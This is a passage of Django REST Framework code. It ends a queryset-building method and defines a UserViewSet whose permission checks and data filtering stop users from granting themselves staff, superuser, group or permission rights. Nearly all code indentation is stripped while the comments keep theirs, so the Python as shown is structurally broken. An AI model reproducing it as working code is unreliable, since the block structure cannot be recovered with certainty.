if metadata and hasattr(self, "metadata"):
                    # Avoid conflicts between identical prefetch lookups
viewset_lookups = [
prefetch if isinstance(prefetch, str) else prefetch.prefetch_through
for prefetch in queryset._prefetch_related_lookups
]
lookups_metadata = []
for lookup in self.metadata or []:
if isinstance(lookup, str):
lookup = Prefetch(lookup)
if lookup.prefetch_through not in viewset_lookups:
lookups_metadata.append(lookup)
lookup.queryset = MetaData.objects.select_valid()
if lookups_metadata:
queryset = queryset.prefetch_related(*lookups_metadata)
            # Add the filter/ordering options to the pagination data
if self.paginator and hasattr(self.paginator, "additional_data"):
                # Force ordering on the primary key when paginating
if hasattr(queryset, "ordered") and not queryset.ordered:
primary_key = get_pk_field(queryset.model)
queryset = queryset.order_by(
*(getattr(queryset, "_fields", None) or distincts or [primary_key.name])
)
self.paginator.additional_data = dict(options=options)
return queryset
except ValidationError as error:
self.queryset_error = error
raise error
class UserViewSet(CommonModelViewSet):
"""
    ViewSet dedicated to the user model
"""
def check_permissions(self, request):
        # Allow the user to edit their own information or that of lower-ranking users
current_user = request.user
if current_user.is_superuser:
return True
elif self.action in ["create"]:
            # Allow creation for everyone
return True
elif self.action in ["update", "partial_update"]:
            # Allow editing oneself or a lower-ranking user
self.kwargs.update({self.lookup_field: self.kwargs.get(self.lookup_url_kwarg or self.lookup_field, None)})
user = self.get_object()
if (current_user == user) or (current_user.is_staff and not (user.is_staff or user.is_superuser)):
return True
        # Apply the standard permission system in every other case
return super().check_permissions(request)
def check_data(self, data):
        # Make sure the user does not grant themselves rights they cannot have
user = self.request.user
if not user or (not user.is_staff and not user.is_superuser):
data["is_active"] = True
if not user or not user.is_staff:
data["is_staff"] = False
if not user or not user.is_superuser:
data["is_superuser"] = False
if "groups" in data and data.get("groups"):
if not user:
data["groups"] = []
elif not user.is_superuser:
groups = user.groups.all()
data["groups"] = list(set(groups) & set(data.get("groups", [])))
if "user_permissions" in data and data.get("user_permissions"):
if not user:
data["user_permissions"] = []
elif not user.is_superuser:
user_permissions = user.user_permissions.all()
data["user_permissions"] = list(set(user_permissions) & set(data.get("user_permissions", [])))
def perform_create(self, serializer):
self.check_data(serializer.validated_data)
super().perform_create(serializer)
def perform_update(self, serializer):
self.check_data(serializer.validated_data)
super().perform_update(serializer)
|